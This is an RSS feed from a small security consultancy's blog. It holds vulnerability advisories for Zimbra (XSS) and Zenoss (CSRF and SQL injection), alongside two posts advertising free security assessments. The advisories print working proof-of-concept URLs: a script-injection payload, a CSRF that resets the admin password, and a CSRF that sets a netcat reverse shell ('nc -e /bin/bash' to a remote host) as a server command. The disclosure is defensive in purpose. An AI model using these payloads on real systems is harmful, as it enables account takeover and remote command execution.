<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>nGenuity Information Services &#187; webappsec</title>
	<atom:link href="http://www.ngenuity.org/wordpress/tag/webappsec/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.ngenuity.org/wordpress</link>
	<description>Security for the A.D.D generation</description>
	<lastBuildDate>Wed, 10 Mar 2010 19:25:58 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Zimbra search skin XSS</title>
		<link>http://www.ngenuity.org/wordpress/2010/03/08/zimbra-search-skin-xss/</link>
		<comments>http://www.ngenuity.org/wordpress/2010/03/08/zimbra-search-skin-xss/#comments</comments>
		<pubDate>Tue, 09 Mar 2010 06:25:48 +0000</pubDate>
		<dc:creator>Adam Baldwin</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Web Application Security]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[NGENUITY-2010-004]]></category>
		<category><![CDATA[webappsec]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[zimbra]]></category>

		<guid isPermaLink="false">http://www.ngenuity.org/wordpress/?p=444</guid>
		<description><![CDATA[nGenuity Information Services &#8211; Security Advisory
   Advisory ID: NGENUITY-2010-004 - Zimbra search skin XSS
   Application: Zimbra
        Vendor: Zimbra
Vendor website: http://www.spiceworks.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
         Class: XSS
Authentication: Valid session required

  I. BACKGROUND
    [...]]]></description>
			<content:encoded><![CDATA[<p>nGenuity Information Services &#8211; Security Advisory</p>
<pre>   Advisory ID: NGENUITY-2010-004 - Zimbra search skin XSS
   Application: Zimbra
        Vendor: Zimbra
Vendor website: <a href="http://www.spiceworks.com" target="_blank">http://www.spiceworks.com</a>
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
         Class: XSS
Authentication: Valid session required

  I. BACKGROUND
     Zimbra [1] is an open-source and commercial messaging and collaboration software
     suite.

 II. DETAILS
     A cross-site script (XSS) vulnerability exists within the classic Zimbra web
     interface. This vulnerability exists due to improper output encoding of the
     skin parameter.

     Example:
     http://example.com/zimbra/h/search?skin=--&gt;&lt;script src=""&gt;&lt;/script&gt;&lt;!--&amp;
     mesg=welcome&amp;initial=true&amp;app=

     The vendor states that this vulnerability is addressed in version 5.0.20 and
     6.0.2. "The 5.0.x series of releases was not vulnerable to this issue.  We
     applied the same change in 5.0.20 that went into 6.0.2, but that was just for
     safety.  In 5.0.x other code prohibited this exploit."</pre>
<pre>III. REFERENCES
     [1] - http://www.zimbra.com

 IV. VENDOR COMMUNICATION
     10.07.2009 - Vulnerability Discovery &amp; Vendor Notification.
     10.08.2009 - Vendor bug filed.
     12.15.2009 - Follow-up to find out fix status.
     12.15.2009 - Vendor Statement that this has been addressed.

The contents of this advisory are copyright (c) nGenuity Information  Security
and may be distributed freely provided that no fee is charged  for this distribution
and proper credit is given.
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.ngenuity.org/wordpress/2010/03/08/zimbra-search-skin-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>NGENUITY-2010-002 Zenoss Multiple Admin CSRF</title>
		<link>http://www.ngenuity.org/wordpress/2010/01/14/ngenuity-2010-002-zenoss-multiple-admin-csrf/</link>
		<comments>http://www.ngenuity.org/wordpress/2010/01/14/ngenuity-2010-002-zenoss-multiple-admin-csrf/#comments</comments>
		<pubDate>Fri, 15 Jan 2010 02:54:11 +0000</pubDate>
		<dc:creator>Adam Baldwin</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Web Application Security]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[webappsec]]></category>

		<guid isPermaLink="false">http://www.ngenuity.org/wordpress/?p=208</guid>
		<description><![CDATA[nGenuity Information Services - Security Advisory
   Advisory ID: NGENUITY-2010-002 - Zenoss Multiple Admin CSRF
   Application: Zenoss 2.3.3
        Vendor: Zenoss
Vendor website: http://www.zenoss.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

  I. BACKGROUND
     Zenoss is a commercial and open source systems and network monitoring [...]]]></description>
			<content:encoded><![CDATA[<pre>nGenuity Information Services - Security Advisory</pre>
<pre>   Advisory ID: NGENUITY-2010-002 - Zenoss Multiple Admin CSRF
   Application: Zenoss 2.3.3
        Vendor: Zenoss
Vendor website: <a title="Zenoss" href="http://www.zenoss.com" target="_blank">http://www.zenoss.com</a>
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

  I. BACKGROUND
     Zenoss is a commercial and open source systems and network monitoring tool. Much
     of the applications functionality is accessible via a front end web application.

 II. DETAILS
<pre>     Multiple CSRF vulnerabilities exist that can allow for arbitrary
     commands to be executed on the Zenoss server as well as reset the Zenoss
     admin password.

     Attack scenario: If an administrator has an active Zenoss
     session and visits one of these links or visits a malicious page that
     contains resources to point to these URL's

     1. Reset user password to a known state Cross-Site Request Forgery CSRF,
     in this case the password is reset to letmein.

http://172.16.28.5:8080/zport/dmd/ZenUsers/admin?defaultAdminLevel:int=1&amp;

        defaultAdminRole=ZenUser&amp;defaultPageSize:int=40&amp;email=&amp;eventConsoleRefresh:
        boolean=True&amp;manage_editUserSettings:method=Save&amp;netMapStartObject=&amp;pager=&amp;
        password=letmein&amp;sndpassword=letmein&amp;zenScreenName=editUserSettings

     2. Change and execute a command CSRF.
     Change the ping command to be a netcat shell out to a remote system. In
     this case an internal system running on port 443

        http://172.16.28.5:8080/zport/dmd/userCommands/ping?command:text=nc -e
        /bin/bash 172.16.28.6 443&amp;commandId=ping&amp;description:text=&amp;
        manage_editUserCommand:method=Save&amp;zenScreenName=userCommandDetail

     Execute the new "ping" command:

http://172.16.28.5:8080/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping</pre>
</pre>
<pre>III. REFERENCES
     [1] - http://www.zenoss.com

 IV. VENDOR COMMUNICATION
     3.10.2009 - Vulnerability Discovery
     8.21.2009 - Requested status from vendor
     9.29.2009 - Vendor call (Fix pending)

Copyright (c) 2009 nGenuity Information Services, LLC</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.ngenuity.org/wordpress/2010/01/14/ngenuity-2010-002-zenoss-multiple-admin-csrf/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>NGENUITY-2010-001 Zenoss getJSONEventsInfo SQL Injection</title>
		<link>http://www.ngenuity.org/wordpress/2010/01/14/ngenuity-2010-001-zenoss-getjsoneventsinfo-sql-injection/</link>
		<comments>http://www.ngenuity.org/wordpress/2010/01/14/ngenuity-2010-001-zenoss-getjsoneventsinfo-sql-injection/#comments</comments>
		<pubDate>Thu, 14 Jan 2010 08:55:57 +0000</pubDate>
		<dc:creator>Adam Baldwin</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Web Application Security]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[sqli]]></category>
		<category><![CDATA[webappsec]]></category>
		<category><![CDATA[zenoss]]></category>

		<guid isPermaLink="false">http://www.ngenuity.org/wordpress/?p=206</guid>
		<description><![CDATA[nGenuity Information Services &#8211; Security Advisory
   Advisory ID: NGENUITY-2010-001 - Zenoss getJSONEventsInfo SQL Injection
   Application: Zenoss 2.3.3
        Vendor: Zenoss
Vendor website: http://www.zenoss.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
           BID: 37802

  I. BACKGROUND
    [...]]]></description>
			<content:encoded><![CDATA[<p>nGenuity Information Services &#8211; Security Advisory</p>
<pre>   Advisory ID: NGENUITY-2010-001 - Zenoss getJSONEventsInfo SQL Injection
   Application: Zenoss 2.3.3
        Vendor: Zenoss
Vendor website: <a title="Zenoss" href="http://www.zenoss.com" target="_blank">http://www.zenoss.com</a>
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
           BID: <a href="http://www.securityfocus.com/bid/37802/exploit">37802</a>

  I. BACKGROUND
     "Zenoss Core is an award-winning open source IT monitoring product that
     effectively manages the configuration, health and performance of
     networks, servers and applications through a single, integrated
     software package." [1] 

II. DETAILS
    getJSONEventsInfo contains multiple SQL Injection vulnerabilities due to improperly
    sanitized user provided input. The following URL parameters are injectable: severity,
    state, filter, offset, and count.

    Authentication as an admin or regular user is required for successful exploitation.
    Depending on the type of attack, it may also be accomplished via Cross-Site Request
    Forgery (CSRF).

    A proof of concept request might look like this
      /zport/dmd/Events/getJSONEventsInfo?severity=1&amp;state=1&amp;filter=&amp;
      offset=0&amp;count=60 into outfile "/tmp/z"</pre>
<pre>III. REFERENCES
     [1] - http://www.zenoss.com

 IV. VENDOR COMMUNICATION
     3.10.2009 - Vulnerability Discovery
     8.21.2009 - Requested status from vendor
     9.29.2009 - Vendor call (Fix pending)

     Update 1.21.2010
     This vulnerability was fixed prior to version 2.5.

http://dev.zenoss.org/trac/changeset/15257

Copyright (c) 2009 nGenuity Information Services, LLC</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.ngenuity.org/wordpress/2010/01/14/ngenuity-2010-001-zenoss-getjsoneventsinfo-sql-injection/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>National Cyber Security Awareness Month</title>
		<link>http://www.ngenuity.org/wordpress/2009/10/01/national-cyber-security-awareness-month-2/</link>
		<comments>http://www.ngenuity.org/wordpress/2009/10/01/national-cyber-security-awareness-month-2/#comments</comments>
		<pubDate>Thu, 01 Oct 2009 17:23:05 +0000</pubDate>
		<dc:creator>Adam Baldwin</dc:creator>
				<category><![CDATA[Awareness]]></category>
		<category><![CDATA[Events]]></category>
		<category><![CDATA[Assessment]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[DHS]]></category>
		<category><![CDATA[free]]></category>
		<category><![CDATA[speak]]></category>
		<category><![CDATA[webappsec]]></category>

		<guid isPermaLink="false">http://www.ngenuity.org/wordpress/?p=430</guid>
		<description><![CDATA[Today marks the kickoff of the 6th annual national cyber security awareness month promoted by the Department of Homeland security. To help promote good security practice and awareness nGenuity is doing free 1 hour security assessments of web applications and networks. We are also available to speak on security related topics for local events at [...]]]></description>
			<content:encoded><![CDATA[<p>Today marks the kickoff of the 6th annual national cyber security awareness month promoted by the Department of Homeland security. To help promote good security practice and awareness nGenuity is doing free 1 hour security assessments of web applications and networks. We are also available to speak on security related topics for local events at no cost during the month of October.</p>
<p>For more detail or if you want to schedule with us please contact Adam Baldwin at 509.396.2075 or <a href="mailto:info@ngenuity-is.com">info@ngenuity-is.com</a></p>
<p><img class="aligncenter size-full wp-image-431" title="nGenuityAd_10-01" src="http://www.ngenuity.org/wordpress/wp-content/uploads/2009/10/nGenuityAd_Sept09-01.jpg" alt="nGenuityAd_10-01" width="378" height="270" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.ngenuity.org/wordpress/2009/10/01/national-cyber-security-awareness-month-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Are you as secure as you think you are?</title>
		<link>http://www.ngenuity.org/wordpress/2009/08/17/are-you-as-secure-as-you-think-you-are/</link>
		<comments>http://www.ngenuity.org/wordpress/2009/08/17/are-you-as-secure-as-you-think-you-are/#comments</comments>
		<pubDate>Mon, 17 Aug 2009 15:09:32 +0000</pubDate>
		<dc:creator>Adam Baldwin</dc:creator>
				<category><![CDATA[nGenuity News]]></category>
		<category><![CDATA[Assessment]]></category>
		<category><![CDATA[free]]></category>
		<category><![CDATA[ninjas]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[webappsec]]></category>

		<guid isPermaLink="false">http://www.ngenuity.org/wordpress/?p=402</guid>
		<description><![CDATA[Most businesses rely heavily on computers and networks to get work done these days. When your computer or network fails you in some way, that has a direct impact on your bottom line. In an effort to help you understand the risks associated with using these essential pieces of technology in your business, and help [...]]]></description>
			<content:encoded><![CDATA[<p>Most businesses rely heavily on computers and networks to get work done these days. When your computer or network fails you in some way, that has a direct impact on your bottom line. In an effort to help you understand the risks associated with using these essential pieces of technology in your business, and help mitigate them, we are giving away a whole pile of consulting time in the form of free security assessments.</p>
<p><strong>What do you get with the free assessment?</strong></p>
<ul>
<li>30 minutes of network and website security assessment by the nGenuity team of security ninjas.</li>
<li>30 minutes of discussion / debrief about any security issues identified.</li>
<li>20% discount on any IT and security consulting and support services through the remainder of 2009.</li>
<li>No hassle or obligation to purchase anything. This is not a hard sell, this is a free service we are offering to improve awareness on network / website security.</li>
</ul>
<p>Follow this link for more information on nGenuity&#8217;s <a title="nGenuity Asessment Services" href="http://ngenuity-is.com/services/assess.php" target="_blank">security assessments</a>.</p>
<p><strong>I already have an &#8220;IT&#8221; person / company that handles this type of stuff for me.</strong></p>
<p style="padding-left: 30px;">Chances are your IT person or company is doing a great job supporting you, but what if that isn&#8217;t the case and you just haven&#8217;t noticed yet? What if security isn&#8217;t their thing? nGenuity already works with a few IT providers to complement the services they provide. There is nothing wrong with getting a second opinion from an expert.</p>
<p><strong>Where do I sign up?</strong></p>
<p style="padding-left: 30px;">Call us at 509-396-2075 and mash the first number that you hear or email us at <a href="mailto:info@ngenuity-is.com">info@ngenuity-is.com</a></p>
<p>Look for the ad (designed by <a title="Piles of Awesomeness" href="http://andyet.net">&amp;yet</a>) for this free assessment in the <a href="http://www.tricitiesbusinessnews.com/current-issue/" target="_blank">Tri-City Area Journal of Business </a>(page 26.)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ngenuity.org/wordpress/2009/08/17/are-you-as-secure-as-you-think-you-are/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
